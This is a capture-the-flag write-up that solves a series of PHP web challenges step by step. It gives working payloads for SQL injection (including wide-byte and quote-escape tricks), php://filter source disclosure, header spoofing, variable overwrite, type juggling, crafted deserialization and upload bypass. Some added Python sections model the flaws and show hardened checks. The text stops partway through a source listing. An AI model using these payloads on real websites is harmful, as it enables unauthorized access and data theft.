WEB
Check-in 1
Open the page.
The flag is right there in the page source.
md5 collision
<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
    if ($a != 'QNKCDZO' && $md51 == $md52) {
        echo "nctf{*****************}";
    } else {
        echo "false!!!";
    }
}
else{
    echo "please input a";
}
?>
Reading it, this is PHP loose-type comparison (==) involving md5 values, so we need a string whose md5 compares equal to md5('QNKCDZO'). A quick search turns up a post that collects most of the usable MD5 values (http://www.219.me/posts/2884.html).
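As an added example (not the page's code), the following Python models PHP's == rule for two numeric-looking strings, reproduces the challenge's check against it, and shows the strict comparison that closes the hole. The value 240610708 is one of the published magic strings the linked post collects; the function names are assumptions for illustration.

```python
import hashlib
import hmac
import re

# PHP 5/7: when BOTH operands of == are "numeric strings" they are compared as numbers.
# "0e830400451993494058024219903391" reads as 0 * 10^830400... == 0.0, so every md5 of
# the form 0e<digits only> is "equal" to every other one under ==.
_NUMERIC_STRING = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$')

def php_loose_equal(a: str, b: str) -> bool:
    """Model of PHP's == between two strings: numeric-string rule, else byte equality."""
    if _NUMERIC_STRING.match(a) and _NUMERIC_STRING.match(b):
        return float(a) == float(b)      # PHP compares them as doubles as well
    return a == b

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_hash(h: str) -> bool:
    """True when a hex digest would be treated as the number zero by PHP's ==."""
    return re.fullmatch(r'0e\d+', h) is not None

def vulnerable_check(a: str) -> bool:
    """The challenge's logic: $a != 'QNKCDZO' && md5('QNKCDZO') == md5($a)."""
    return a != 'QNKCDZO' and php_loose_equal(md5_hex('QNKCDZO'), md5_hex(a))

def hardened_check(a: str) -> bool:
    """The fix: compare the digests byte for byte (PHP: === or hash_equals())."""
    return a != 'QNKCDZO' and hmac.compare_digest(md5_hex('QNKCDZO'), md5_hex(a))
```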
Check-in 2
Opening the page shows the prompt.
Trying what it says, the last character cannot be typed.
So modify the request in Burp Suite instead.
Flag obtained.
This one isn't WEB
Opening the page shows an animated image.
Download it and open it in UltraEdit (UE); the flag is at the very bottom of the file.
Layer by layer
A guess-the-trick challenge.
Poke around a little and
the flag turns up directly.
AAencode
It is obviously an encoding scheme (AAencode).
Decoding it gives the flag.
Single for twenty years
Open the page and click the link; it redirects.
Given the hint about hand speed, intercept with Burp Suite and send the request to Repeater for analysis.
Where are you from
Nothing on the page, and nothing useful in the source either.
It appears the request needs a forged origin to get access; using a Firefox add-on,
set a Referer header and the flag is returned.
php decode
The page shows a piece of code; running it errors out, apparently a misuse of eval. Replacing eval with echo prints the result, which is the flag.
<?php
function CLsI($ZzvSWE)
{
    $ZzvSWE = gzinflate(base64_decode($ZzvSWE));
    for ($i = 0; $i < strlen($ZzvSWE); $i++)
    {
        $ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);
    }
    return $ZzvSWE;
}
echo (CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));
?>
File inclusion
php://filter is a meta-wrapper designed for filtering a data stream as it is opened.
- include "test.php": PHP file inclusion inserts code written in another file into the execution flow. The file is read as a data stream, so php://filter can be applied to filter it; the return value is 0 or 1.
- readfile("test.php") reads the file as a data stream without executing it, although the browser will render it on the front end. The return value is the number of bytes.
- file_get_contents("test.php") returns the text content.
This challenge relies on file inclusion combined with stream filtering. Normally when including a file we write include "test.php", and test.php is parsed and executed directly. With readfile("test.php") it is not parsed, so it cannot be displayed in the browser.
The hint shows this is a typical file-inclusion vulnerability; in such cases use the filter wrapper to read the PHP source code:
http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
This dumps a long string, which is base64 encoded:
PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=
Decoding it gives:
<html>
    <title>asdf</title>
<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file);
    //flag:nctf{edulcni_elif_lacol_si_siht}
?>
</html>
Which contains the flag.
Single for a hundred years won't help either
Open the link and intercept with Burp Suite; click the link, click key, and analyse the request in Repeater to get the flag.
Download~!
Capture the traffic with Burp Suite and compare the two download requests: the URL parameter varies and is base64 encoded.
So construct the base64 encoding of download.php,
put it in the URL, and the source comes back:
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>
The source reveals a hereiskey.php;
build its URL the same way, submit, and the flag is returned.
COOKIE
The page says login is required; capturing with Burp Suite shows the response carries Login=0.
Combined with the hint, we need Login=1,
so set it with the Firefox add-on Live HTTP Headers
and resubmit to get the flag.
MYSQL
Don't get too happy; the flag isn't here. Do you understand what this file is for?
In CTF competitions this file often holds hint information.
TIP: sql.php
<?php
if($_GET[id]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
    mysql_select_db(SAE_MYSQL_DB);
    $id = intval($_GET[id]);
    $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
    if ($_GET[id]==1024) {
        echo "<p>no! try again</p>";
    }
    else{
        echo($query[content]);
    }
}
?>
Following the hint, open robots.txt, which holds the code above. Because intval() converts its argument to an integer (http://www.php.net/manual/zh/function.intval.php), the raw parameter is compared against 1024 while the query uses the truncated value, so sql.php?id=1024.1 gives the flag.
sql injection 3
Opening it shows:
Executed SQL: SELECT id,title FROM news WHERE id='1'
Try closing the quote.
However the input is constructed, a \ shows up:
http://115.28.150.176/sqli/index.php?id=1' select * from news
So the backslash has to be got rid of. Trying other ids, id=2
shows a hint:
id: 2 title: gbk_sql_injection
So this is a wide-byte injection. Looking it up,
when a %df byte precedes the quote it swallows the \.
After several attempts, the final construction:
http://115.28.150.176/sqli/index.php?id=%df' union select *,1 from flag%23
shows the flag.
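The root cause of the wide-byte injection above, as an added Python example that is not part of the original writeup: a byte-oriented escaper inserts 0x5C, the database decodes the bytes as GBK and merges 0xDF 0x5C into one character, so the quote survives unescaped. The function names and the hardened parse_news_id are assumptions for illustration.

```python
# Wide-byte (GBK) injection: the escaper works on bytes, the database decodes them as
# multi-byte GBK characters, and the backslash the escaper inserted vanishes into one.

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP's addslashes(): prefix ' " \\ and NUL with \\."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)               # the backslash
        out.append(b)
    return bytes(out)

def as_seen_by_db(raw: bytes, charset: str) -> str:
    """What the database sees after escaping, once it decodes the bytes as `charset`."""
    return addslashes(raw).decode(charset, errors='replace')

def build_query(id_param: bytes, charset: str) -> str:
    """The challenge's statement, SELECT id,title FROM news WHERE id='...', as the DB reads it."""
    return "SELECT id,title FROM news WHERE id='" + as_seen_by_db(id_param, charset) + "'"

def literal_is_intact(sql: str) -> bool:
    """True when no unescaped quote occurs inside the single-quoted literal."""
    body = sql[sql.index("'") + 1:sql.rindex("'")]
    i = 0
    while i < len(body):
        if body[i] == '\\':
            i += 2                         # escaped character, skip it
            continue
        if body[i] == "'":
            return False                   # the literal was closed early
        i += 1
    return True

def parse_news_id(raw: bytes) -> int:
    """Hardened handling: the id is a number, so accept only ASCII digits and bind it as a
    parameter. If escaping must be used, it has to know the connection's real charset
    (mysql_set_charset rather than SET NAMES) so the bytes are grouped the way MySQL groups them."""
    text = raw.decode('ascii')             # rejects any non-ASCII byte such as 0xDF
    if not text.isdigit():
        raise ValueError("id must be a decimal integer")
    return int(text)
```

With charset 'gbk' the 0xDF byte and the inserted 0x5C decode to a single character and literal_is_intact reports the broken literal; with a single-byte charset the backslash stays put.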
/x00
view-source:
if (isset ($_GET['nctf'])) {
    if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
        echo '必須輸入數字才行';
    else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)
        die('Flag: '.$flag);
    else
        echo '騷年,繼續努力吧啊~';
}
Clearly string truncation; construct:
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%23biubiubiu
to get the flag.
Alternatively: nctf[]=1.#biubiubiu
Reference: http://www.2cto.com/article/201502/377462.html
bypass again
if (isset($_GET['a']) and isset($_GET['b'])) {
    if ($_GET['a'] != $_GET['b'])
        if (md5($_GET['a']) === md5($_GET['b']))
            die('Flag: '.$flag);
        else
            print 'Wrong.';
}
At first I thought this was md5 loose comparison, but it turns out to be strict comparison with ===, so I looked at how md5 behaves instead: with ?a[]=1&b[]=2
md5 cannot handle arrays and returns false on both sides, the comparison matches, and the flag is returned.
Variable overwrite
Viewing the source reveals a source.php;
opening it shows the key code:
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
    <?php
    extract($_POST);
    if ($pass == $thepassword_123) { ?>
        <div class="alert alert-success">
            <code><?php echo $theflag; ?></code>
        </div>
    <?php } ?>
<?php } ?>
There is an extract() call;
looking it up, this is a known weakness:
http://www.w3school.com.cn/php/func_array_extract.asp
So the existing values don't matter; just overwrite them in the POST body.
Flag: nctf{bian_liang_fu_gai!}
PHP is the best language in the world
<?php
if(eregi("hackerDJ",$_GET[id])) {
    echo("<p>not allowed!</p>");
    exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
    echo "<p>Access granted!</p>";
    echo "<p>flag: *****************} </p>";
}
?>
The problem in this challenge is urldecode():
the incoming $_GET[id]
has already been URL-decoded once by the web server. So id=hackerDJ
just needs to be URL-encoded twice.
The final payload is:
Impostor
The hint says you must log in locally. Easy: use Modify Headers to add X-Forwarded-For: 127.0.0.1
and refresh to get the flag.
Header
As the hint says, look at the response headers to get the flag.
Upload bypass
Since it is an upload bypass, first try changing the extension; that fails.
Guess a truncation: build the filename xi.php .jpg
and change the space to 00 in hex to bypass the upload check; that doesn't get through either.
There is a /uploads directory,
and the request carries a dir parameter with the value uploads, so construct /uploads/xi.php[space]
and change that space in hex,
while the filename further down stays filename="xi.php.jpg.
See the reference link.
SQL injection 1
Source:
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
    mysql_select_db(SAE_MYSQL_DB);
    $user = trim($_POST[user]);
    $pass = md5(trim($_POST[pass]));
    $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
    echo '</br>'.$sql;
    $query = mysql_fetch_array(mysql_query($sql));
    if($query[user]=="admin") {
        echo "<p>Logged in! flag:******************** </p>";
    }
    if($query[user] != "admin") {
        echo("<p>You are not admin!</p>");
    }
}
echo $query[user];
?>
A simple injection; construct
user=admin '#
It errors. Reading the source carefully, there is a (
that needs to be closed:
user=admin ')#
Flag: nctf{ni_ye_hui_sql?}
pass chack
Core source:
<?php
$pass=@$_POST['pass'];
$pass1=*;//the hidden password
if(isset($pass)) {
    if(@!strcmp($pass,$pass1)){
        echo "flag:nctf{*}";
    } else {
        echo "the pass is wrong!";
    }
} else {
    echo "please input pass!";
}
?>
The hint makes it plain and clear;
construct
Naming is hard
<?php
function noother_says_correct($number)
{
    $one = ord('1');
    $nine = ord('9');
    for ($i = 0; $i < strlen($number); $i++)
    {
        $digit = ord($number{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            return false;
        }
    }
    return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
    echo $flag;
else
    echo 'access denied';
?>
Clearly key has to be supplied without any digit from 1 to 9, yet it must still compare equal to 54975581388; so try hexadecimal: 54975581388 is exactly 0xccccccccc, none of whose digits fall in 1-9.
http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
gives the flag.
Password reset
A baffling challenge; just capture the request and change user1=YWRtaW4=
and user=admin
to get the flag.
php deserialization
I learned a lot from this one.
<?php
class just4fun {
    var $enter;
    var $secret;
}
if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];
    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }
    $o = unserialize($pass);
    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>
Since
get_magic_quotes_gpc() (which returns the current magic_quotes_gpc configuration setting)
now always returns FALSE,
because the magic-quotes feature has been removed from PHP,
the challenge is really about serialization and deserialization.
See this link:
http://www.cnblogs.com/A-Song/archive/2011/12/13/2285619.html
In short:
- serialize() converts structured data into a string in a prescribed format.
- unserialize() restores a serialized string to its original format or structure.
The passed-in value is first unserialized into o.
Then o->secret is assigned "*",
and if $o->secret === $o->enter, o->secret is printed.
Since it is hard to make them equal by value, the documentation tells us:
In PHP, the one exception to ordinary assignment by value is objects: in PHP 5 they are assigned by reference unless the clone keyword is used explicitly. PHP also supports reference assignment, written
$var = &$othervar;
Reference assignment means the two variables point to the same data; nothing is copied.
We construct:
<?php
class just4fun {
    var $enter;
    var $secret;
}
$o = new just4fun();
$o->enter = &$o->secret; // the key step: by passing a reference, $o->enter and $o->secret share one value, so the two are always equal
echo serialize($o);
?>
The serialized string is:
O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
Submit it to get the flag.
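To show exactly why the R:2; token works, here is an added example (not the page's or the challenge's code): a minimal Python reader for PHP's serialize() format that numbers values the way php_var_unserialize does and lets a back-reference alias an earlier slot, plus a cheap detector for reference tokens. Class and function names are assumptions for illustration.

```python
import re

class Slot:
    """One PHP zval. Two properties that share a Slot behave like a PHP reference (&)."""
    def __init__(self, value):
        self.value = value

class PhpObject:
    def __init__(self, class_name):
        self.class_name = class_name
        self.props = {}                      # property name -> Slot

    def get(self, name):
        return self.props[name].value

    def set(self, name, value):
        self.props[name].value = value       # writes through the (possibly shared) Slot

def has_reference_token(serialized: str) -> bool:
    """Heuristic detector: R:n; / r:n; back-references never occur in a plain data object.
    The real mitigation is not to unserialize() untrusted input at all (use json_decode)."""
    return re.search(r'[;{][Rr]:\d+;', serialized) is not None

def php_unserialize(data: str):
    """Minimal reader for PHP's serialize() format: N, i, b, s, O and R.
    As in PHP, every value gets a numbered slot except R, which reuses an earlier one."""
    slots = []

    def read_str(pos):                       # s:len:"text"; -> (text, next_pos), no slot
        colon = data.index(':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                    # skip :"
        return data[start:start + length], start + length + 2    # skip ";

    def parse(pos):                          # -> (Slot, next_pos)
        tag = data[pos]
        if tag == 'N':
            slot = Slot(None)
            slots.append(slot)
            return slot, pos + 2
        if tag in ('i', 'b'):
            end = data.index(';', pos)
            slot = Slot(int(data[pos + 2:end]))
            slots.append(slot)
            return slot, end + 1
        if tag == 's':
            text, nxt = read_str(pos)
            slot = Slot(text)
            slots.append(slot)
            return slot, nxt
        if tag == 'R':                       # back-reference: alias an earlier slot
            end = data.index(';', pos)
            return slots[int(data[pos + 2:end]) - 1], end + 1
        if tag == 'O':
            colon = data.index(':', pos + 2)
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len]
            count_start = colon + 2 + name_len + 2     # skip ":
            brace = data.index(':', count_start)
            count = int(data[count_start:brace])
            obj = PhpObject(name)
            slot = Slot(obj)
            slots.append(slot)               # the object is numbered before its properties
            p = brace + 2                    # skip :{
            for _ in range(count):
                key, p = read_str(p)
                obj.props[key], p = parse(p)
            return slot, p + 1               # skip }
        raise ValueError("unsupported tag %r at offset %d" % (tag, pos))

    root, _ = parse(0)
    return root.value

def challenge_check(payload: str, secret: str = "*") -> bool:
    """The challenge's logic: unserialize, overwrite secret, then test secret === enter."""
    o = php_unserialize(payload)
    o.set('secret', secret)
    return o.get('secret') == o.get('enter')
```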
sql injection 4
There is a hint:
TIP: a backslash can be used for escaping
Look carefully at how the relevant functions work.
View the source:
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';
function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}
echo $flag;
-->
From this we see get_magic_quotes_gpc(),
which checks the magic-quotes setting; newer PHP versions have removed the feature, so it does not get in the way here.
Meaning:
when magic_quotes_gpc is on, every ' (single quote), " (double quote), \ (backslash) and NUL character is automatically escaped with a backslash.
link
It is paired with stripslashes(),
which removes all the \
link
while htmlentities($str, ENT_QUOTES)
encodes all double and single quotes.
link
Reading the SQL query, to get past it the condition has to be made always true by adding or 1,
but there is a quote in the way before it.
There are two ways to deal with that quote:
- close it with '
- escape it with \
I set up a local environment for this one.
Here, because ' is encoded, \ can be used instead
to neutralize the quote.
So the payload:
http://chinalover.sinaapp.com/web15/index.php?username= \&password= or 1%23
Roughly, the query that gets executed is
SELECT * FROM users WHERE name=' \' AND pass=' or 1#';
Flag: nctf{sql_injection_is_interesting}
Comprehensive
Opening it shows jother-encoded text; running it in the Firefox console gives the decoded result:
1bc29b36f623ba82aaf6724fd3b16718.php
Opening that turns out to be wrong, and I get taunted for it.
Time to look at the tip: bash
Searching around leads to /.bash_history,
the file that stores command history, so try accessing
http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/.bash_history
which gives
zip -r flagbak.zip ./*
Accessing flagbak.zip directly
downloads an archive containing the flag.
SQL injection 2
View the source:
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
    mysql_select_db(SAE_MYSQL_DB);
    $user = $_POST[user];
    $pass = md5($_POST[pass]);
    $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
    if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
        echo "<p>Logged in! Key: ntcf{**************} </p>";
    }
    else {
        echo("<p>Log in failure!</p>");
    }
}
?>
The key code:
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
    echo "<p>Logged in! Key: ntcf{**************} ";
}
strcasecmp
compares case-insensitively, so we only need the password hash the query returns to equal the md5 of what we submit; the hint says union, so the simplest payload:
http://4.chinalover.sinaapp.com/web6/index.php?user=' union select md5(1)# & pass=1
gives the flag.
Comprehensive 2
Gathering information:
The page is a message board. Since this is not an XSS challenge, it presumably involves injection, so click around a little.
A hint says to view the source; it contains some links, but opening them yields nothing useful, except that clicking this one gives a hint:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
Clearly a file left over from installation that someone forgot to delete...
As for why the link shows up on the home page, ask the administrator...
=============================== fancy divider =============================
This CMS is a company message-board system developed by Funny Inc. According to our CTO it is built with world-class
technology; its security and practicality are rock solid~</br>
Below is a description of what each CMS file does (the programmer was lazy and only listed some of them)
config.php: holds the database settings; change them when porting this CMS
index.php: the home page
passencode.php: Funny Inc.'s home-grown password encryption library
say.php: receives and processes users' comment submissions
sm.txt: this CMS's documentation
SAE's information_schema table does not seem to be queryable, so here is the admin table structure
create table admin (
id integer,
username text,
userpass text,
)
========================================================================
Now the serious part:
This penetration-testing platform was developed by 三隻小瀦 (root#zcnhonker.net) & 冷愛 ([email protected]),
and painstakingly modified by me, your boss Zhou, so that not every challenge gets AK'd, right? So if you solve this one, you're pretty damn good.
This reveals several files, but they cannot be accessed directly; guess that they can be read through the file parameter:
http://cms.nuptzj.cn/about.php?file=
which yields index.php,
passencode.php,
say.php,
config.php
and about.php in turn.
about.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php')){
    echo "file參數不能爲空!";
    exit();
}else{
    $cut=strchr($file,"loginxlcteam");
    if($cut==false){
        $data=file_get_contents($file);
        $date=htmlspecialchars($data);
        echo $date;
    }else{
        echo "<script>alert('敏感目錄,禁止查看!但是。。。')</script>";
    }
}
index.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
if(!isset($_COOKIE['username'])){
    setcookie('username','');
    setcookie('userpass','');
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>皇家郵電滲透測試平臺</title>
<style type="text/css">
<!--
.STYLE1 {font-size: 18px}
-->
</style>
</head>
<body>
<center>
<h1>Xlcteam客戶留言板</h1>
<p><hr /> </p>
<div align="left" style="width:1024px">
  <h3> 歡迎來到Xlcteam客戶留言板,各位朋友可以在這裏留下對本公司的意見或建議。<br /><br />
  本組織主要爲企業提供網絡安全服務。正如公司名所說,本公司是混跡在“娛樂圈”中的公司,喜歡裝B,一直摸黑競爭對手,從未被黑。<br />
  本公司的經營理念爲“技術好,算個吊,摸黑對手有一套,坑到學生才叫吊~”。<br />
  你別說不爽我們,有本事來爆我們(科哥)菊花~ come on!! </h3>
</div>
<hr />
<div id="msg" name="msg" align="left" style="width:1024px">
  <h2>客戶留言: </h2><hr /><br />
  <?php
  // the user comments are output here
  include 'antixss.php';
  include 'config.php';
  $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!!".mysql_error());
  mysql_select_db($db_name,$con);
  $page=$_GET['page'];
  if($page=="" || $page==0){
      $page='1';
  }
  $page=intval($page);
  $start=($page-1)*7;
  $last=$page*7;
  $result=mysql_query("SELECT * FROM `message` WHERE display=1 ORDER BY id LIMIT $start,$last");
  if(mysql_num_rows($result)>0){
      while($rs=mysql_fetch_array($result)){
          echo htmlspecialchars($rs['nice'],ENT_QUOTES).":<br />";
          echo ' '.antixss($rs['say']).'<br /><hr />';
      }
  }
  mysql_free_result($result);
  ?>
  <center>
  <p><a href="index.php">首頁</a>
  <?php
  $contents=mysql_query("SELECT * FROM `message` WHERE display=1");
  if(mysql_num_rows($contents)>0){
      $num=mysql_num_rows($contents);
      if($num%8!=0){
          $pagenum=intval($num/8)+1;
      }else{
          $pagenum=intval($num/8);
      }
      for($i=1;$i<=$pagenum;$i++){
          echo '<a href="index.php?page='.htmlspecialchars($i).'">'.htmlspecialchars($i).'</a> ';
      }
  }
  mysql_free_result($contents);
  mysql_close($con);
  ?>
  <a href="index.php?page=<?php echo htmlspecialchars($pagenum);?>">尾頁</a>
  </p>
  <form method="post" action="./so.php">
  留言搜索(輸入ID):
  <input name="soid" type="text" id="soid" />
  <input type="submit" value="搜索"/>
  </form>
  </center>
</div>
<hr />
<div id="say" name="say" align="left" style="width:1024px">
  <h2>留言:</h2>
  <form method="post" action="./preview.php">
  <span class="STYLE1">暱稱:</span>
  <input name="nice" type="text" id="nice"
  <?php
  // read the nickname cookie and display it as value=""
  $username=$_COOKIE['username'];
  $username=htmlspecialchars($username,ENT_QUOTES);
  echo ' value="'.$username.'" ';
  ?> />
  </label>
  <p class="STYLE1">內容:<br />
  <textarea style="width:800px;height:100px" name="usersay" id="usersay"></textarea>
  <label>
  <br />
  <input onclick="return checkform()" type="submit" name="Submit" style="width:600px;height:50px" value="預覽" />
  </label>
  <br />
  (可用[a]網址[/a]代替<a href="網址" >網址</a>) </p>
  </form>
</div>
<div>
  <h4><a href="./about.php?file=sm.txt">本CMS說明</a></h4>
</div>
<div align="center">
  鳴謝·紅客聯盟(HUC)官網<br />
</div>
</center>
<script>
function checkform(){
    if(say.nice.value=="" || say.usersay.value==""){
        alert("暱稱或留言內容不能爲空");
        return false;
    }else{
        return true;
    }
</script>
</body>
</html>
passencode.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
function passencode($content){
    //$pass=urlencode($content);
    $array=str_split($content);
    $pass="";
    for($i=0;$i<count($array);$i++){
        if($pass!=""){
            $pass=$pass." ".(string)ord($array[$i]);
        }else{
            $pass=(string)ord($array[$i]);
        }
    }
    return $pass;
}
?>
say.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
include 'config.php';
$nice=$_POST['nice'];
$say=$_POST['usersay'];
if(!isset($_COOKIE['username'])){
    setcookie('username',$nice);
    setcookie('userpass','');
}
$username=$_COOKIE['username'];
$userpass=$_COOKIE['userpass'];
if($nice=="" || $say==""){
    echo "<script>alert('暱稱或留言內容不能爲空!(如果有內容也彈出此框,不是網站問題喔~ 好吧,給個提示:查看頁面源碼有驚喜!)');</script>";
    exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!!".mysql_error());
mysql_select_db($db_name,$con);
$nice=mysql_real_escape_string($nice);
$username=mysql_real_escape_string($username);
$userpass=mysql_real_escape_string($userpass);
$result=mysql_query("SELECT username FROM admin where username='$nice'",$con);
$login=mysql_query("SELECT * FROM admin where username='$username' AND userpass='$userpass'",$con);
if(mysql_num_rows($result)>0 && mysql_num_rows($login)<=0){
    echo "<script>alert('暱稱已被使用,請更換!');</script>";
    mysql_free_result($login);
    mysql_free_result($result);
    mysql_close($con);
    exit();
}
mysql_free_result($login);
mysql_free_result($result);
$say=mysql_real_escape_string($say);
mysql_query("insert into message (nice,say,display) values('$nice','$say',0)",$con);
mysql_close($con);
echo '<script>alert("構建和諧社會,留言需要經過管理員審覈纔可以顯示!");window.location = "./index.php"</script>';
?>
From index.php
we learn of antixss.php,
and the source also shows so.php
and preview.php.
preview.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>預覽留言</title>
</head>
<body>
<?php
$prenice=$_POST['nice'];
$presay=$_POST['usersay'];
include 'antixss.php';
?>
<center>
<div id="say" name="say" align="left" style="width:1024px">
  <form method="get" action="./say.php">
  <p>
  <input name="nice" type="hidden" id="nice" value=<?php echo '"'.htmlspecialchars($prenice).'"'; ?> />
  <input name="usersay" type="hidden" id="usersay" value=<?php echo '"'.antixss($presay).'"'; ?> />
  <?php echo htmlspecialchars($prenice); ?>:<br />
  <?php echo antixss($presay);?><br /><br />
  <input onclick="return checkform()" type="submit" name="Submit" style="width:600px;height:50px" value="確認提交" />
  </p>
  </form>
</div>
(提示:再次提醒,xss不保證可以成功,允許留言是爲了增加娛樂性,換條思路吧!,因爲我也不會xss- -~)
</center>
<script>
function checkform(){
    if(say.nice.value=="" || say.usersay.value==""){
        alert("暱稱或留言內容不能爲空");
        return false;
    }else{
        return true;
    }
</script>
</body>
</html>
so.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>搜索留言</title>
</head>
<body>
<center>
<div id="say" name="say" align="left" style="width:1024px">
<?php
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){
    echo '萬惡滴黑闊,本功能只有用本公司開發的瀏覽器纔可以用喔~';
    exit();
}
$id=$_POST['soid'];
include 'config.php';
include 'antiinject.php';
include 'antixss.php';
$id=antiinject($id);
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數據庫!!".mysql_error());
mysql_select_db($db_name,$con);
$id=mysql_real_escape_string($id);
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result);
echo htmlspecialchars($rs['nice']).':<br /> '.antixss($rs['say']).'<br />';
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
